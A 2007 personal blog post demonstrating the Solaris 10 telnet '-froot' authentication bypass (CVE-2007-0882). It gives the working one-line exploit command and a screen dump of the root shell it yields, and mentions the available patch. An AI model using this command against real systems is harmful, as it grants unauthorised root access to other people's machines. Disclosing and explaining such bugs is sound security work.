Tuesday, May 1, 2007

Inbuilt vulnerabiliy support !

I have been thinking about starting a technical blog for quite sometime. And I am excited to start with writing about security. From the early days at college, I was told that getting root / administrator is the biggest thing a computer engineer can do and some of my friends were successful enough to crack a Novel Netware network and use it for getting some pr0n. Finally one hell of a anti-cracker caught them, 'disassembled and analysed' the whole .EXE file they used to crack the Novel Netware and suspended them from the lab. (The anti-cracker had used a tool called Turbo Disassembler to do the magic.) Now please don't ask me how he managed to do that. I am trying to figure out that for years and once I understand how to do that, I will go to Himalayas and spend rest of my life as a sadhu ! (some snaps) And then there was another guy who told me that copying and pasting the GNU/Linux boot messages to some file will solve all the X related issues in RedHat 7.0. (LOL ! I hope he will be reading this.)

Ok :-) Thats old story about getting root.

Recently I happened to check a Solaris 10 box. This version of operating system comes with an interesting zero-day bug.

Try "telnet -l '-froot' IP" and you can login to a Solaris 10 box without a password !

I know, no one is going to believe this. so I have added the screen dump below:


[~]$telnet -l '-froot' IP
Trying IP...
Connected to IP(IP).
Escape character is '^]'.
Last login: Wed Apr 19 00:28:17 from IP
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
You have new mail.
# bash


Ok, lets try a cat /etc/release

bash-3.00# cat /etc/re
reboot release remote
bash-3.00# cat /etc/release
Solaris 10 6/06 s10s_u2wos_09a SPARC
Copyright 2006 Sun Microsystems, Inc. All Rights Reserved.
Use is subject to license terms.
Assembled 09 June 2006


Still not convinced ?


bash-3.00# id
uid=0(root) gid=0(root)
bash-3.00#

Oh yea !!! You can login without a root password !

btw what is this '-f ' option ?

GNU/Linux man page says "If Kerberos V5 authentication is being used, the -f option allows the local credentials to be forwarded to the remote system."

Details: CVE-2007-0882 (the telnet "-froot" bug)

The Register has an article here

Sun has announced a workaround and a patch for it.
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)